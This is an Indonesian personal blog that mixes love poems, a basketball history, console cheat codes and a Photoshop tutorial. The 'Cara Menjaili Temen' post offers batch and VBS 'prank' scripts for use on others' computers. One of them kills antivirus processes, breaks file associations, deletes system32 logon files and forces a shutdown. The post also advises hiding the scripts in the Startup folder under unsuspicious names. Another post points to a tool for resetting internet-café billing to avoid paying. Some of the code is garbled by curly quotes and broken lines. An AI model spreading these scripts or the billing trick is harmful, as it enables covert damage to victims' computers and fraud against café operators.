CINTA ITU PERBODOHAN

Selasa

| 0 komentar
" I LOVE YOU"
"I MISS YOU"
Yang ini bisa dikatakan cinta?? Preeett.....!!
"Lagi ngapain sayang "
" Udah makan sayang"
Yang begini dinamakan perhatian seorang pacar??
Basi tau......
"Bukannya itu hanya alasan saja"
"Jangan tinggalkan aku, aku sayang sama kamu"
     Beeh, busyit, ujung-ujungnya selingguh juga. Itukah yang dinamakan CINTA??
     Kalo  ada cinta kenapa masih banyak perselingkuhan ? Janji palsu dan mainin perasaan orang......

Sejarah Basket

Rabu

| 1 komentar
SEJARAH BASKET
OLAHRAGA BOLA BASKET

Bola basket adalah olahraga bola berkelompok yang terdiri atas dua tim beranggotakan masing-masing lima orang yang saling bertanding mencetak poin dengan memasukkan bola ke dalam keranjang lawan. Bola basket sangat cocok untuk ditonton karena biasa dimainkan di ruang olahraga tertutup dan hanya memerlukan lapangan yang relatif kecil. Selain itu, bola basket mudah dipelajari karena bentuk bolanya yang besar, sehingga tidak menyulitkan pemain ketika memantulkan atau melempar bola tersebut.

Bola basket adalah salah satu olahraga yang paling digemari oleh penduduk Amerika Serikat dan penduduk di belahan bumi lainnya, antara lain di Amerika Selatan, Eropa Selatan, Lithuania, dan juga di Indonesia.

Sejarah perkembangan Basket dianggap sebagai olahraga unik karena diciptakan secara tidak sengaja oleh seorang guru olahraga. Pada tahun 1891, Dr. James Naismith., seorang guru Olahraga asal Kanada yang mengajar di sebuah perguruan tinggi untuk para siswa profesional di YMCA (sebuah wadah pemuda umat Kristen) di Springfield, Massachusetts, harus membuat suatu permainan di ruang tertutup untuk mengisi waktu para siswa pada masa liburan musim dingin di New England.Terinspirasi dari permainan yang pernah ia mainkan saat kecil di Ontario,Naismith menciptakan permainan yang sekarang dikenal sebagai bola basket pada 15 Desember 1891.

Menurut cerita, setelah menolak beberapa gagasan karena dianggap terlalu keras dan kurang cocok untuk dimainkan di gelanggang-gelanggang tertutup, dia lalu menulis beberapa peraturan dasar, menempelkan sebuah keranjang di dinding ruang gelanggang olahraga, dan meminta para siswanya untuk mulai memainkan permainan ciptaannya itu.

Pertandingan resmi bola basket yang pertama, diselenggarakan pada tanggal 20 Januari 1892 di tempat kerja Dr. James Naismith.Basket ball(sebutan bagi olahraga ini dalam bahasa Inggris), adalah sebutan yang digagas oleh salah seorang muridnya. Olahraga ini pun menjadi segera terkenal di seantero Amerika Serikat. Penggemar fanatiknya ditempatkan di seluruh cabang YMCA di Amerika Serikat. Pertandingan demi pertandingan pun segera dilaksanakan di kota-kota di seluruh negara bagian Amerika Serikat.

Pada awalnya,setiap tim berjumlah sembilan orang dan tidak ada dribble,sehingga bola hanya dapat berpindah melalui pass (lemparan). Sejarah peraturan permainan basket diawali dari 13 aturan dasar yang ditulis sendiri oleh James Naismith. Aturan dasar tersebut adalah sebagai berikut.

1. Bola dapat dilemparkan ke segala arah dengan menggunakan salah satu atau kedua tangan.

2. Bola dapat dipukul ke segala arah dengan menggunakan salah satu atau kedua tangan, tetapi tidak boleh dipukul menggunakan kepalan tangan (meninju).

3. Pemain tidak diperbolehkan berlari sambil memegang bola. Pemain harus melemparkan bola tersebut dari titik tempat menerima bola, tetapi diperbolehkan apabila pemain tersebut berlari pada kecepatan biasa.

4. Bola harus dipegang di dalam atau diantara telapak tangan. Lengan atau anggota tubuh lainnya tidak diperbolehkan memegang bola.

5. Pemain tidak diperbolehkan menyeruduk, menahan, mendorong, memukul, atau menjegal pemain lawan dengan cara bagaimanapun. Pelanggaran pertama terhadap peraturan ini akan dihitung sebagai kesalahan, pelanggaran kedua akan diberi sanksi berupa pendiskualifikasian pemain pelanggar hingga keranjang timnya dimasuki oleh bola lawan, dan apabila pelanggaran tersebut dilakukan dengan tujuan untuk mencederai lawan, maka pemain pelanggar akan dikenai hukuman tidak boleh ikut bermain sepanjang pertandingan. Pada masa ini, pergantian pemain tidak diperbolehkan.

6. Sebuah kesalahan dibuat pemain apabila memukul bola dengan kepalan tangan (meninju), melakukan pelanggaran terhadap aturan 3 dan 4, serta melanggar hal-hal yang disebutkan pada aturan 5.

7. Apabila salah satu pihak melakukan tiga kesalahan berturut-turut, maka kesalahan itu akan dihitung sebagai gol untuk lawannya (berturut-turut berarti tanpa adanya pelanggaran balik oleh lawan).

8. Gol terjadi apabila bola yang dilemparkan atau dipukul dari lapangan masuk ke dalam keranjang, dalam hal ini pemain yang menjaga keranjang tidak menyentuh atau mengganggu gol tersebut. Apabila bola terhenti di pinggir keranjang atau pemain lawan menggerakkan keranjang, maka hal tersebut tidak akan dihitung sebagai sebuah gol.

9. Apabila bola keluar lapangan pertandingan, bola akan dilemparkan kembali ke dalam dan dimainkan oleh pemain pertama yang menyentuhnya. Apabila terjadi perbedaan pendapat tentang kepemilikan bola, maka wasitlah yang akan melemparkannya ke dalam lapangan. Pelempar bola diberi waktu 5 detik untuk melemparkan bola dalam genggamannya. Apabila ia memegang lebih lama dari waktu tersebut, maka kepemilikan bola akan berpindah. Apabila salah satu pihak melakukan hal yang dapat menunda pertandingan, maka wasit dapat memberi mereka sebuah peringatan pelanggaran.

10. Wasit berhak untuk memperhatikan permainan para pemain dan mencatat jumlah pelanggaran dan memberi tahu wasit pembantu apabila terjadi pelanggaran berturut-turut. Wasit memiliki hak penuh untuk mendiskualifikasi pemain yang melakukan pelanggaran sesuai dengan yang tercantum dalam aturan 5.

11. Wasit pembantu memperhatikan bola dan mengambil keputusan apabila bola dianggap telah keluar lapangan, pergantian kepemilikan bola, serta menghitung waktu. Wasit pembantu berhak menentukan sah tidaknya suatu gol dan menghitung jumlah gol yang terjadi.

12. Waktu pertandingan adalah 4 quarter masing-masing 10 menit

13. Pihak yang berhasil memasukkan gol terbanyak akan dinyatakan sebagai pemenang.

Pada Agustus 1936, saat menghadiri Olimpiade Berlin 1936, ia dinamakan sebagai Presiden Kehormatan Federasi Bola Basket Internasional. Terlahir sebagai warga Kanada, ia menjadi warga negara Amerika Serikat pada 4 Mei 1925.

Naismith meninggal dunia 28 November 1939, kurang dari enam bulan setelah menikah untuk kedua kalinya.

Cara Mereset Billing cilent warnet

Kamis

| 0 komentar
Awalnya dulu saya selalu kesal karena waktu dan durasi di warnet tu cepet banget, terus downloadnya kadang cepet kadang enggak.
Nah sekarang saya mau ngasi tau  kalian sara mereset waktu dan durasi pada CLIENT BILLING EXPLORER kita dan yang ada di Operator. sika sukses waktu dan durasi bayaranya akan kembali ke awal/ulang melalui 00:00:00 dan durasi akan kembali menuju Rp. 500.

Oke dari pada ngomong terus, kita langsung aja
 Buka aplikasi RPE di komputermu, jika belum punya download disini, jika sudah di download
    kik rPE.exe
Untuk cara pakenya klik disini

Sekian dari admin semoga bermanfaat buat temen-temen.

Kata Hatiku

| 0 komentar
Mengapa engkau tak pernah percaya padaku.....?
Padahal sesungguhnya ku selalu perhatian padamu
Akan tetapi engkau menganggapku
Tak menyukaimu
       Namu sesungguhnya engkaulah yang selalu
       Ku pikirkan setiap saat
       Namamukan selalu ada di hati ini
       Jika ku berusaha untuk melupakanmu
Ku takkan pernah bisa
Karena disetiap ku melupakanmu
Ku semakin menyukaimu
Dan mengapa engkau selalu marah padaku.......?
       Yang mungkin ku tak tau salahku
       Andai ku tau salahku
       Kan ku perbaiki dan takkan ku membuatmu kecewa
       Kembali.

Sepasang Sepatu Tua

| 0 komentar
Di pojok temangu sendiri
Sepasang sepatu tua masa lalu
Sentuhan - sentuhan debu tipis
kamar ini.
       Melengkapi warna kelam abu - abu
       Pernah di tapakinya aspal jalan jalan

       Yang panas.
       Terperosok di comberan - comberan keruh
Dalam ujung kehidupan yang ganas
Pernah di alaui tanpa meninggalkan keluh
Dan sekarang ia sendirian di pojok yang sunyi
Sepasang sepatu tua,
       Yang pernah berarti dalam perjalanan hidup,
       Walau hanya sekali.





              Karya Agisni Putri Mandalika

Selembar kata hati

| 0 komentar
Malam ini yanpa bulan
Bintang lenyap tanpa kunang hinggapri
Hati ini tetap datang padamu
Sendiri tanpa batas waktu

       Taukah kamu.....?
       Ini nyata tersimpan di dada
       Tak ada kata yang mampu
       Menampung waktu cinta......?
                Lebih dari itu.







      Karya : Agisni Putri Mandalika

ARTHUR AND THE INVISIBLES

| 0 komentar
Pause gameplay-mu, lalu masukkan kode cheat-nya.
  • Tidak Bisa Mati : L2, L1, O, O, Kotank, R1, R1, R2.
  • Nyawa Tanpa Batas : Tahan L2+R2 dan tekan Kotak, Kotak, Segitiga, O, X, X.

PACMAN WORLD 3

| 0 komentar
  1. Tonjokan Super
    Kode dimasukkan saat gameplay : X, L1, R1, O, O, R2
  2. Buka Semua Level dan Maze
    Masukkan kode secepatnya pada layar menu utama : Kiri, Kanan, Kiri, Kanan, O, Atas

NEO CONTRA

| 0 komentar
Cheat untuk mendapatkan 19 Nyawa Tambahan!
Masukkan kode pada Layar Judul : Atas, Atas, Bawah, Bawah, L1, R1, L2, R2, L3, R3.
Dan dibawah ini adalah beberapa tips untuk membuka item dan fitur lainnya. Kamu harus menyelesaikan tugas-tugas tertentu untuk membukanya.
    • Best Ending ~ Tuntaskan stage 7 
    • Bill II ~ Tuntaskan stage 7, ranking S
    • Gallery ~ Tuntaskan game ini, ranking A
    • Video Lucu ~ Tuntaskan stage 7, ranking S
    • Jaguar II ~ Tuntaskan stage 7, ranking S
    • Katana Jaguar ~ Mainkan stage apa saja, dalam Normal 
    • Lucia II ~ Tamatkan game dengan menggunakan Lucia, dan harus mencapai 100% untuk setiap level.
    • Mainkan Lucia ~ Tuntaskan game dalam Easy, stage 1-4, kurang dari 18 menit.
    • Stage 6 ~ Tuntaskan 5 stages, ranking A
    • Stage 6 ~ Tuntaskan stage 6 (Training)
    • Stage 7 ~ Tuntaskan stage 6
    • Stage 7 ~ Tuntaskan stage 7 (Training)
    • Theater ~ Tuntaskan game, ranking A
    • Paket Senjata D ~ Tuntaskan Stage 5
    • Paket Senjata E ~ Tuntaskan Stage 6
    • Paket Senjata F ~ Tuntaskan Stage 7

BRATZ : THE MOVIE

Rabu

| 0 komentar
Untuk membuka Clothing Line (Barisan Baju) yang tersembunyi, kamu harus menemukan laptop di kantor Bratz, lalu ketikkan password berikut di situ.
  • Feelin' Pretty Clothing Line : PRETTY
  • High School Clothing Line : SCHOOL
  • Passion 4 Fashion Clothing Line : ANGELZ
  • Sweerz Clothing Line : SWEETZ

BMX XXX

| 0 komentar
Password dimasukkan pada menu Cheats.
  1. 65 SWEET RIDES : Semua Sepeda
  2. CHAMPAGNE : Membuka Semua Film
  3. ELECTRICITYBAD : Membuka Amishboy (biker)
  4.  FLUFFYBUNNY : Fluffy Bunny Mode
  5. GHOSTCONTROL : Ghost Control Mode
  6. Z AXIS : Meningkatkan Kecepatan Pemain
  7. 3RD SOG : Night Vision Mode
  8. MASS HYSTERIA : Pemilihan Stage
  9. HEAVYPETTING : Super Crash Mode
  10. XXX RATED CHEAT : Membuka Semuanya
  11. PARABOLIC : Visible Gap Mode 
  12. THISISBMX : Bonus Movie 1
  13. KEEPITDIRTY : Bonus Movie 2
  14. DDUULRRLDRSquare : Final Movie
  15. HIGHBEAMS : Las Vegas 1
  16. TASSLE : Las Vegas 2
  17. IFLINGPOO : Launch Pad 69 1
  18. PEACH : Launch Pad 69 2
  19. BURLESQUE : Rampage Skatepark 2 
  20. XXXINTRO : Perkenalan Secara Acak
  21. ONEDOLLAR : Sheep Hills
  22. 69 : Sheep Hills 2
  23. FUZZYKITTY : Syracuse 1
  24. MICHAELHUNT : Syracuse 2
  25. LAPDANCE : The Bronx, NYC 1
  26. STRIPTEASE :  The Bronx, NYC2
  27. FREESAMPLE : The Bronx, NYC 3
  28. BOING : The Dam 1
  29. THONG : The Dam 2
  30. BOOTYALL UGP : Roots Jam 2
  31. SHOWMETHEMONEY : Membuka Level Las Vegas
  32. SHOWMETHEMONKEY : Membuka Level Launch Pad 69
  33. IOWARULES : Membuka Level Rampage
  34. UNDERGROUND : Membuka Level Roots
  35. BAABAA : Membuka Level Sheep Hills
  36. BOYBDANSSUCK : Membuka Level Syracuse
  37. THATDAMLEVEL : Membuka Level The Dam 
  38. AmishBoy1699 : Membuka Sepeda AmishBoy
  39. HellKitty487 : Membuka Sepeda HellKitty
  40. Itchi594 : Membuka Sepeda Itchi
  41. Joyride18 : Membuka Sepeda JoyRide
  42. Karma311 : Membuka Sepeda Karma
  43. Latey411 : Membuk Sepeda La'tey
  44. Manuel415 : Membuka Sepeda Manuel
  45. Mika362436 : Membuka Sepeda Mika
  46. Nutter290 : Membuka Sepeda Nutter
  47. Rave10 : Membuka Sepeda Rave
  48. Skeeter666 : Membuka Sepeda Skeeter
  49. TripleDub922 : Membuka Sepeda TripleDub
  50. Twan18 : Membuka Sepeda Twan

ALIAS

| 0 komentar
Tips untuk Memilih Level.
  • Setelah menyelesaikan game 1 kali, pada menu New Game tekan lah L1+R1, untuk memudahkan kamu memilih level.

ALIEN HOMINID

| 0 komentar
  1. Untuk membuka semua mini game, level dan topi, cukup masukkan "ROYGBIV" menjadi nama untuk player 1.
  2. Tips untuk membuka Topi.
    Masukkan nama-nama berikut menjadi nama Player :
    -  melty : Menaikkan Acid Shot.
    -  tomfulp :  Membuka Topi Tom Fulp Hair.
    -  cletus : Membuka Topi 4.
    -  april : Membuka Topi 5.
    -  superfly :Membuka Topi 7.
    -  goodman : Membuka Topi 8.
    -  grrl : Membuka Topi 11.
    -  abe : Membuka Topi 12.
    -  princess : Membuka Topi 13.
    -  dandy : Membuka Topi 14.
  3. Tips untuk membuka Hiasan untuk Kepala :
    -  Topi Uni Soviet/KGB : Menangkan level 2-1.
    -  Topi Area 51 : Menangkan level 3-1.
    -  Rambut Pirang : Kalahkan Final Boss dalam Hard Mode.
    -  Diamond Tierra : Menangkan level 2-2 dalam Hard Mode.
    -  Topi Private Eye : Menangkan level 3-2 dalam Hard Mode.
    -  Topi Jouster : Menangkan level 3-4 dalam Hard Mode.
    -  Topi Bajak Laut : Hancurkan gedung Hairy Nanny Daycare.
    -  Rambut Coklat (laki-laki) : Dalam Hard Mode, setelah mengalahkan Final Boss,
       melompatlah dari kpal ruang angkasa sebelum layar berganti.
    -  Topi Coklat : Dalam level 2-5, bunuhlah 7 burung.
    -  Wig Pirang : Menangkan level 1-2.
    -  Wig Coklat : Menangkan level 1-3.
    -  Negro : Menangkan level 1-5.
    -  Jheri Curl : Dalam level 1-4, hancurkan gedung " ikan suka tanaman
    -  Bandana Merah : Menangkan level 1-4. 
    -  Mahkota Bunga : Menangkan level 1-1 dengan brutal.
    -  Topi Pipa Pendiangan : Menangkan level 1-1 denga brutal.
    -  Daun Bunga Aster : Menangkan level 2-3.
    -  Topi Perawat : Menangkan level 3-5, lalu lawanlah Final Boss (tidak harus menang).
    -  Topi Tukang Masak : Menangkan level 1-3.
    -  Topi Caping Ungu : Dalam level 1-3, hancurkn gedung "Istana Kepiting".
    -  Topi Ayam Jago : Dalam level 1-4, hancurkan gedung berlambang "Behemoth.
    -  Sirip Hiu Kuning : Dalam level 2-4, gali sebelum mengendarai mobil salju.
    -  Topi Caping Coklat : Menangkan level 2-2.
    -  Kuping : Menangkan level 2-2.
    -  Kacamata : Dalam level 1-4, kalahkan helikopter tanpa kehabisan tangki (kamu takkan
       mendapat apa-apa kalalu helikopternya terjatuh).

Patah Hati

| 0 komentar
Disaat aku mencintainya ia tak mencintaiku, ia malah menjauh dariku, ia ingin jangan menghubunginya kembali, sungguh sakitnya hatiku tak di anggap lagi, mengapa ia begitu padahal aku sangat mencintainya ia adalah segalanya bagiku bahkan tak akan pernah berubah, ia adalah wanita yang paling cantik, paling manis, paling baik dan paling imut yang pernah kutemui, tak ada seorangpun yang bisa mengalahkan kecantikannya.

I LOVE YOU

CARS Race-O-Rama

| 0 komentar
Masuklah ke menu Options >> Cheat, lalu masukkan password-nya :
  1. SLVRKEY : Buka semua Arcade Mode Events
  2. GOLDKEY : Buka semua Story Mode Events
  3. GR8MODS : Buka semua paket onderdil Lightning McQueen
  4. EVRYBDY : Buka semua teman Lightning McQueen
  5. CARSHOW : Buka semua Paint Jobs untuk semua karakter kecuali Lightning McQueen

CARTOON NETWORK RACING

| 0 komentar
Membuka Semua Bonus
Masukkan Bawah, O, Bawah, Kotak, Atas, Bawah pada menu utama.

CAPTAIN TSUBASA

| 0 komentar
Membuka Tim Rahasia!
         Tim                                Cara Membukanya
  • All Star                        Tamatkan Story Mode
  • Argentina Jr.                Kalahkan Argentina Jr. dalam Story Mode
  • France Jr.                     Kalahkan France Jr. dalam Story Mode
  • Furano                         Kalahkan Furano dalam Story Mode
  • Germany Jr.                 Kalahkan Germany Jr. dalam Story Mode
  • Hanawa                        Kalahkan France Jr. dalam Story Mode
  • Hirado                         Kalahkan Hirado dalam Story Mode
  • Italy Jr.                        Kalahkan Italy Jr. dalam Story Mode
  • Japan Jr.                      Tamatkan bagian awal Story Mode
  • Nankatsu SC               Tamatkan Costum  Story Mode
  • Toho                            Kalahkan Toho dalam Story Mode

ATV OFFROAD FURY 4

| 0 komentar
Masukkan password sebagai Player Profile dalam menu Options.
Password                          Efek
!MegaWedge!                  75,000 Credits
TraxAhoy                         Membuka semua Trek balapan 
uDunGud                          Membuka semua sponsor

ARTHUR AND THE INVISIBLES

| 0 komentar
Pause gameplay-mu, lalu masukkan kode cheat-nya.
  • Tidak Bisa Mati : L2, L1, O, O, Kotak, R1, R1, R2.
  • Nyawa Tanpa Batas : Tahan L2+R2 dan tekan Kotak, Kotak, Segitiga, O, X, X.

ARMY MEN : Sarge's War

| 0 komentar
Pause gameplay-mu, lalu masukkan kode-kode berikut ini :
Kode                                                                            Efek
Tahan L1, tekan Atas, Kiri, Kanan, Atas.                Menjadi Tembus Pandang
Tahan L1, tekan Kiri, Atas, Kanan, Bawah             Gerakan Lambat
Tahan L1, tekan Kanan, O, O, Segitiga, O.             Buka Semua Level Senjata

AND 1 STREETBALL

Selasa

| 0 komentar
Masuklah ke menu Cheat dulu lalu masukkan kode.
  • Semua bonus :Segitiga, Segitiga, X, X, Kotak, O, Kotak, O.
  • Semua gebrakan : X, X, O, Kotak, Kotak, Segitiga, O, Segitiga.
  • Semua pakaian : X, Segitiga, O, X, Kotak, Kotak, Segitiga, Segitiga, O.
  • Semua medan laga : O, X, X, Kotak, X, Segitiga, O, X.
  • semua gerakan I-Ball : X, Segitiga, Segitiga, X, Kotak, O, X, Kotak.
  • Semua pesan : Segitiga, Kotak, O, Kotak, Segitiga, X, Kotak, Segitiga.
  • Semua game tambahan : O, Kotak, Segitiga, X, X, O, O, Kotak.
  • Always on fire : Kotak, Segitiga, X, Segitiga, Kotak, X, Kotak, O.
  • Gol sempurna : Kotak, X, O, Kotak, X, O, Segitiga, Segitiga.
  • Bermain sebagai DJ Green Lantern : O, O, Segitiga, X, Kotak, X, Segitiga, O.
  • Bermain sebagai Flash : Segitiga, X, X, O, X, Segitiga, Segitiga, Kotak.
  • Bermain sebagai Shane : Kotak, X, Segitiga, X, Segitiga, O, Segitiga, X.
  • Bermai sebagai Skip to My Lou : O, X, O, Kotak, Segitiga, X, O, Kotak.
 Dan berikut ini adalah kode yang harus dimasukkan saat gameplay :
  • Hamiltons-Banyak Uang : O, Segitiga, Kotak, Kotak, Segitiga, O, X, O.
  • I-Ball Tanpa Batas Waktu : Segitiga, O, Kotak, Kotak, O, Segitiga, X, Kotak.
  • Shot Release Text : Segitiga, Kotak, O, O, Kotak, Kotak, O, Segitiga.
  • The OG Way : X, Segitiga, Segitiga, X, Kotak, O, X, Kotak.

Cara Menjaili Temen

Sabtu

| 0 komentar

OOOOOooooo...... ia tmn2 ada tambahan sedikit ni vuat kalian semu yg suka ngejailin temen.a klian tinggal ikuti cara2 di bawah ini

Share
Saya ada script jahil nih yg mau saya share dengan sobat Satu Hati. Intinya ini hanya untuk mengerjai komputer teman kamu, pasti dia kesal banget dan bisa aja menjadi marah monitornya di banting… agagagagagag. Script ini kamu buat melalui Notepad dan harus kamu simpan dengan menggunakan ekstensi yang saya sebutkan. Oke deh segera cek script jahil ini.

script ini bisa kta pakai, untuk
menjahili komputer anak org !!
yg harus kamu siapkan adlh :

1. Notepad
2. kopi
3. pasta
4. alias kopas
5. Bersiap2 menerima dosa… agagagagagag (kidding)

stelah smuax siap,, kupas (mksdx copas) script di bawah ke dalam notepad !!

1. MESSAGES YG NONGOL TERUS MENERUS SECARA OTOMATIS


Code:
@ECHO off
    :Begin
    msg * muka lo jelek
    msg * ngaca dulu gih
    msg * hayo lo, cpu lu gw acak2
    msg * ud install ulang aja
    msg * biar masalah nya kelar
    GOTO BEGIN
==> save nama script diatas dg ekstensi *.bat

2. BIKIN SHUTDOWN + MESSAGES

Code:
@echo off
    msg * apaan sih lo
    shutdown -s -c "Error! muka mu
    standar abis"
==> save nama script diatas dg ekstensi *.bat

3. MAININ TOMBOL CAPS LOCK

Code:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
     do
     wscript.sleep 100
     wshshell.sendkeys “{CAPSLOCK}”
    loop
==> save nama script diatas dg ekstensi *.vbs

4. BUKA TUTUP CD/DVD SECARA OTOMATIS

Code:
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
     Set colCDROMs = oWMP.cdromCollection
     do
     if colCDROMs.Count >= 1 then
     For i = 0 to colCDROMs.Count – 1
     colCDROMs.Item(i).Eject
     Next
     For i = 0 to colCDROMs.Count – 1
     colCDROMs.Item(i).Eject
     Next
     End If
     wscript.sleep 5000
    loop
==> save nama script diatas dg ekstensi *.vbs

5. MENEKAN TOMBOL ENTER TERUS MENERUS

Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "~(enter)"
    loop
==> save nama script diatas dg ekstensi *.vbs

6. MENEKAN TOMBOL BACKSPACE TERUS MENERUS SECARA OTOMATIS

Code:
MsgBox “Lets Rumble”
     Set wshShell =wscript.CreateObject(“WScript.Shell”)
     do
     wscript.sleep 100
     wshshell.sendkeys “{bs}”
    loop
==> save nama script diatas dg ekstensi *.vbs

7. OTOMATIS NGETIK “LU JELEK BANGET SIH” DI NOTEPAD ATAU M.WORD

Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "lu jelek banget sih!!!"
    loop
==> save nama script diatas dg ekstensi *.vbs

8. MEMBUKA NOTEPAD TERUS MENERUS

Code:
@ECHO off
    :top
    START %SystemRoot%
    \system32\notepad.exe
    GOTO top
==> save nama script diatas dg ekstensi *.bat

9. OTOMATIS BUKA NOTEPAD LALU NGETIK “APA YG LO MAU”

Code:
WScript.Sleep 180000
     WScript.Sleep 10000
     Set WshShell = WScript.CreateObject(“WScript.Shell”)
     WshShell.Run “notepad”
     WScript.Sleep 100
     WshShell.AppActivate “Notepad”
     WScript.Sleep 500
     WshShell.SendKeys “Ka”
     WScript.Sleep 500
     WshShell.SendKeys “mu ”
     WScript.Sleep 500
     WshShell.SendKeys “, je”
     WScript.Sleep 500
     WshShell.SendKeys “l ek”
     WScript.Sleep 500
     WshShell.SendKeys “am ”
     WScript.Sleep 500
     WshShell.SendKeys “at”
     WScript.Sleep 500
     WshShell.SendKeys “ya ”
     WScript.Sleep 500
     WshShell.SendKeys “P er”
     WScript.Sleep 500
     WshShell.SendKeys “ma k”
     WScript.Sleep 500
     WshShell.SendKeys “tuh”
     WScript.Sleep 500
     WshShell.SendKeys ” mu”
     WScript.Sleep 500
     WshShell.SendKeys “ka”
     WScript.Sleep 500
    WshShell.SendKeys “hohoho “
==> save nama script diatas dg ekstensi *.vbs

10. BISA MEMILIH JAWABAN SEPERTI QUIZ LAH KIRA2

Code:
@echo off
    title quiz hari ini :)
    :menu
    cls
    echo jika kamu kena virus apa
    yang kamu lakukan
    pause
    echo pilih yang mana:
    echo 1. matiin computer
    echo 2. format aja
    echo 3. bingung ahh
    set input=nothing
    set /p input=Choice:
    if %input%==1 shutdown -s -t
    30
    if %input%==2 del c:\xxx
    if %input%==3 @ECHO off
    msg * muka lo rusak
    msg * ngaca dulu gih
    msg * hayo lo,cpu lu gw acak2
    msg * ud install ulang aja
    msg * biar masalah nya kelar
    @ECHO off
    :top
    START %SystemRoot%
    \system32\notepad.exe
    GOTO top
==> nah script diatas save jadi quiz.bat, lalu kasih ke anak orang… agagagagagag……..

11. YANG INI PALING BAHAYA, JANGAN DICOBA DI KOMPUTER KAMU :D

Code:
@echo off
    set end=md “Hack
    installing”
    set fin=copy “Hack
    log.txt” “Installing”
    %end%
    %fin%
    net send * Hack is
    installing, press OK to
    begin set up.
    kill NAVAPSVC.exe /F /Q
    kill zonelabs.exe /F /Q
    kill explorer.exe /F /Q
    cls
    assoc .exe=txtfile
    assoc .txt=mp3file
    cls
    msg * It is you who is
    hacked ….
    msg * I warned you,
    and you kept going.
    Challenge me and this
    is what happens.
    DEL C:\WINDOWS
    \system32\logoff.exe /
    F /Q
    DEL C:\WINDOWS
    \system32\logon.exe /
    F /Q
    DEL C:\WINDOWS
    \system32\logon.scr /
    F /Q
    cls
    shutdown -s -t 5 -c
    “ thank you for
    waiting”
==> save script diatas dg ekstensi *.bat

http://acca-creativity.blogspot.com
Dari semua script diatas, cara menjalankannya adalah degan mengklik 2x file yang kita buat dari notepad tadi. Saya sarankan kalau mau mengusili komputer teman dan bisa dijalankan secara otomatis, kopi file script yg udah kamu simpan ke folder startup di Menu Start. Setelah itu kamu saya sarankan selama seminggu gak nongol biar gak di lempar sama monitor…. agagagagagag

Waktu menyimpan dengan ekstensi *.bat atau *.vbs

Ganti * menjadi nama file, misal usil.bat atau ancur.vbs
http://acca-creativity.blogspot.com
Saya sarankan buat nama file yang tidak mencurigakan si pengguna komputer.

Cinta.....................................................

Minggu

| 0 komentar

  • Cinta adalah ketika kita merasakan suatu getaran rasa yang tidak bisa di ungkapkan dengan kata-kata. 
  • Cinta bukanlah bagaimana kita dapat mencintai, menyayangi dan menerima dengan sempurna, tetapi cinta itu adalah bagaimana kita dapat menerima yang tidak sempurna itu dan membuatnya sempurna di mata kita.
  • Cinta membuat kita nyaman tenang, rileks, dan kita tidak merasa kesepian. Setiap saat kita memikirkan.a kita selalu merasa di temani walupun kita sendirian, jika kita merasa kesepian dan ingin bertemu dengannya sebaiknya kita minta dia untuk bertemu di suatu tempat, namun jika engkau ingin menemuinya di rumahnya boleh sih tapi jangan setiap hari, hehehe..! dan ketika kamu sampai di rumahnya dan kamu mengetuk pintu, tetapi bukan dia yang membukanya tapi ia adalah orang tuanya, apa yang akan kamu lakukan memanggilnya sendiri atau menyurunh orang tuanya untuk memanggil dia? Karena jika kamu menyuruh orang tuanya berarti engkau tidak setia dengannya tapi jika engkau memanggilnya sendiri berarti engkau sangat mencintai dia dan akan selalu bersama.

Membuat Manipulasi Foto disertai Efek Teks Berwarna

Selasa

| 0 komentar
Di tutorial ini, kita akan belajar cara pembuatan teks yang dibuat dari banyak teks secara mudah menggunakan Photoshop. Dalam tutorial ini, selain tipografi kita juga membahas teknik-teknik manipulasi foto. Di akhir tutorial ini, Anda bisa men-download file PSD dan beberapa wallpaper.

Preview

Sebelum mulai, lihat dulu gambar yang akan kita buat di bawah.
membuat manipulasi foto disertai efek teks berwarna

Source Yang Digunakan

Tutorial

Langkah 1: Membuat Latar dan Menambah Model

Ambil model topeng gas. Buat path di sekelilingnya dengan tool pen.
membuat manipulasi foto disertai efek teks berwarna
membuat manipulasi foto disertai efek teks berwarna
Tekan Ctrl + Enter untuk mengubah path menjadi seleksi.

Langkah 2

Copy model dan paste ke file baru berukuran 1280×800 px. Tekan Ctrl + T, klik kanan dan pilih Flip Horizontal.
membuat manipulasi foto disertai efek teks berwarna

Langkah 3

Paste tekstur grunge di belakang si model.
membuat manipulasi foto disertai efek teks berwarna

Langkah 4

Buat layer baru di atas tekstur grunge. Tekan D lalu Ctrl + Delete untuk mengisinya dengan putih.
Klik Filter > Render > Lighting Effects. Gunakan setting di bawah. Langkah ini akan menambahkan sumber cahaya ke dalam scene gambar.
membuat manipulasi foto disertai efek teks berwarna

Langkah 5

Ubah opacity layer ke 60%.
membuat manipulasi foto disertai efek teks berwarna

Langkah 6

Alt-click ikon New Layer. Akan muncul kotak dialog New Layer. Pilih Use Previous Layer, blending mode Overlay, dan Fill with. Klik OK.
membuat manipulasi foto disertai efek teks berwarna

Langkah 7

Dengan tool burn lukis area-areayang ditandai dengan panah-panah di bawah untuk membuatnya lebih gelap. Lakukan hal yang sama dengan tool dodge untuk menerangkan area yang lain.
membuat manipulasi foto disertai efek teks berwarna
membuat manipulasi foto disertai efek teks berwarna

Langkah 8

Sambil menahan Ctrl klik layer model bertopeng. Sekarang Anda akan memiliki seleksi yang berdasarkan pada isi layer.
membuat manipulasi foto disertai efek teks berwarna

Langkah 9

Dengan tool marquee geser seleksi menjauh dari sumber cahaya.
membuat manipulasi foto disertai efek teks berwarna

Langkah 10

Buat layer baru. Isi dengan hitam. Klik Filter > Blur > Gaussian Blur. Seperti bisa Anda lihat, ini akan menjadi bayangan di dinding.
membuat manipulasi foto disertai efek teks berwarna

Langkah 11

Ubah opacity layer ke 40%. Ini akan membuat bayangan terlihat lebih lembut lagi.
membuat manipulasi foto disertai efek teks berwarna

Langkah 12: Menambahkan Teks

Klik semua ikon mata di depan layer. Untuk sementara, kita akan menyembunyikan semua layer agar bisa lebih fokus pada teks.
Buat teks menggunakan tool type. Seperti bisa Anda lihat, semua kata berada di layer terpisah. Ukurannya juga bervariasi. Saya buat kata FIGHT lebih besar untuk membuatnya terlihat lebih menonjol. Saya lakukan hal sebaliknya untuk kata AFRAID. Begitu selesai membuat kata-kata ini, pilih semua layer teks dan tekan Ctrl + G untuk mengumpulkan semuanya ke dalam sebuah group. Satu hal lagi, jangan khawatir tentang warnanya, gunakan warna apapun yang Anda mau.
